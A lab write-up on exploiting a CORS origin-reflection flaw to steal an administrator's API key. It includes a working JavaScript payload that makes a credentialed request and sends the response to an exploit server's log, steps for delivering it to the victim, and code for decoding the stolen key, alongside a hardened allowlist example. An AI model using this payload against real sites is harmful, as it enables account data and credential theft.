CORS vulnerability with basic origin reflection
Lab Description
Log in to the application using the provided credentials: wiener:peter.
Navigate to the account details page and inspect the response to /accountDetails. It contains:
User information such as the username, email, and API key.
The response header Access-Control-Allow-Credentials: true, which tells the browser that the server accepts cross-origin requests carrying the user's credentials (for example, session cookies) and will let the requesting origin read the response.
A server that sets this header must validate the Origin request header strictly. If that validation is flawed, an attacker's page can make the victim's browser send an authenticated request and read the response, which is the vector exploited here.
Send the /accountDetails request to Burp Repeater and add the header Origin: https://evil.com to the request.
Observe the response: the server reflects the supplied Origin value in the Access-Control-Allow-Origin response header (Access-Control-Allow-Origin: https://evil.com), alongside Access-Control-Allow-Credentials: true.
This is a vulnerable CORS configuration: any origin is trusted, and because credentials are allowed as well, a page on an arbitrary site can make the victim's browser send their session cookie and then read the JSON response.
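The check performed in Repeater above, modelled in code, as an added example that is not part of the original write-up: a handler that reflects the Origin header the way the lab does, a hardened allowlist version, and the classification a tester applies to the response. Function names, the allowlist contents and the probe origin are assumptions for illustration.

```javascript
// Added example, not from the original write-up. Models the origin-reflecting
// CORS logic the lab exhibits, a hardened allowlist version, and the check a
// tester applies to a Repeater response. Names and allowlist are assumptions.

// Vulnerable behaviour: the Origin request header is echoed verbatim into
// Access-Control-Allow-Origin, and credentials are allowed.
function reflectingCorsHeaders(originHeader) {
  if (originHeader === undefined) return {};
  return {
    'Access-Control-Allow-Origin': originHeader,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened behaviour: exact string match against a fixed allowlist; any other
// origin gets no CORS headers at all, so the browser refuses the read.
// Vary: Origin stops a cache from serving one origin's ACAO to another.
const TRUSTED_ORIGINS = new Set(['https://app.example', 'https://admin.example']); // assumed
function allowlistCorsHeaders(originHeader) {
  if (!TRUSTED_ORIGINS.has(originHeader)) return {};
  return {
    'Access-Control-Allow-Origin': originHeader,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// The Repeater check: a page on probeOrigin can read the response only if
// ACAO equals that exact origin AND ACAC is 'true'. Browsers never honour a
// wildcard ACAO together with credentials, so '*' alone is not exploitable
// this way.
function isExploitableFrom(headers, probeOrigin) {
  return headers['Access-Control-Allow-Origin'] === probeOrigin &&
         headers['Access-Control-Allow-Credentials'] === 'true';
}

// Run the probe against a handler with an attacker-controlled origin.
function probe(handler, probeOrigin = 'https://evil.com') {
  return isExploitableFrom(handler(probeOrigin), probeOrigin);
}

console.log('reflecting handler exploitable:', probe(reflectingCorsHeaders)); // true
console.log('allowlist handler exploitable:', probe(allowlistCorsHeaders));   // false
```

The allowlist version is an exact-match comparison on purpose: prefix or suffix checks (for example, "starts with https://app.example") are a common way to reintroduce the same bug with a registered look-alike domain.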
Using the information gathered, the plan is to:
Exploit the insecure CORS configuration.
Use JavaScript to retrieve the administrator's API key from the account details endpoint.
Code Breakdown
The complete payload, to be placed inside <script> tags in the exploit server's response body. Replace the lab host placeholder with your own lab URL; the onload callback body is written out here from the breakdown that follows.

```javascript
var req = new XMLHttpRequest();
req.onload = function () {
    // Send the API response (which contains the API key) to the exploit server's log.
    location = '/log?key=' + this.responseText;
};
req.open('get', 'https://<lab-host>/accountDetails', true);
req.withCredentials = true;
req.send();
```

var req = new XMLHttpRequest();
Creates a new object to send an HTTP request.
req.onload = function () { ... }
Defines a callback that runs once the HTTP request completes. It appends the server's response (the JSON containing the API key) to /log?key= and navigates to that URL. Because the script runs on the exploit server's origin, the relative path /log resolves to the exploit server, so the data is written to its access log.
req.open('get', 'https://<lab-host>/accountDetails', true);
Prepares an asynchronous GET request for the account details.
req.withCredentials = true;
Includes the victim's cookies in the cross-origin request. This is what makes the server return the administrator's own details rather than an unauthenticated response, and it is only useful because the server answers with Access-Control-Allow-Credentials: true.
req.send();
Sends the crafted request.
Upload the crafted JavaScript payload to your exploit server.
Deliver the exploit to the victim (the administrator) by sharing the link to the exploit server.
Monitor the exploit server's access log.
Observe the request made by the victim's browser: a GET to /log?key=... whose query string carries the URL-encoded JSON body of the administrator's /accountDetails response.
URL-decode the query string to extract the administrator's API key.
Submit the captured API key as prompted to complete the lab.
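The decoding step in the procedure above, as an added example that is not part of the original write-up: pulling the API key out of a captured exploit-server access-log line. The log line is constructed for the example, and the log layout and the JSON field names (username, email, apikey) are assumptions about what the lab's /accountDetails response and the exploit server's log look like.

```javascript
// Added example, not from the original write-up. Extracts the API key from a
// captured exploit-server access-log line. SAMPLE_LOG_LINE is constructed; the
// log layout and JSON field names are assumptions.
const SAMPLE_LOG_LINE =
  '10.0.0.5  2024-01-01 12:00:00 +0000 "GET /log?key=' +
  '%7B%22username%22%3A%22administrator%22%2C' +
  '%22email%22%3A%22admin%40example%22%2C' +
  '%22apikey%22%3A%22EXAMPLEKEY123%22%7D HTTP/1.1" 200 "Mozilla/5.0"';

// Returns the apikey field from the first /log?key=... request in the line,
// or null if the line carries no usable payload.
function extractExfiltratedKey(logLine) {
  const match = logLine.match(/\/log\?key=([^\s"]+)/);
  if (!match) return null;
  try {
    // The victim's browser percent-encoded the JSON when it navigated to
    // /log?key=<responseText>; undo that and parse the original body.
    const details = JSON.parse(decodeURIComponent(match[1]));
    return typeof details.apikey === 'string' ? details.apikey : null;
  } catch (_e) {
    // Malformed or truncated payload: decodeURIComponent or JSON.parse threw.
    return null;
  }
}

console.log(extractExfiltratedKey(SAMPLE_LOG_LINE)); // EXAMPLEKEY123
```

If the victim's browser left characters such as braces unencoded, decodeURIComponent passes them through untouched, so the same function handles both fully and partially encoded payloads.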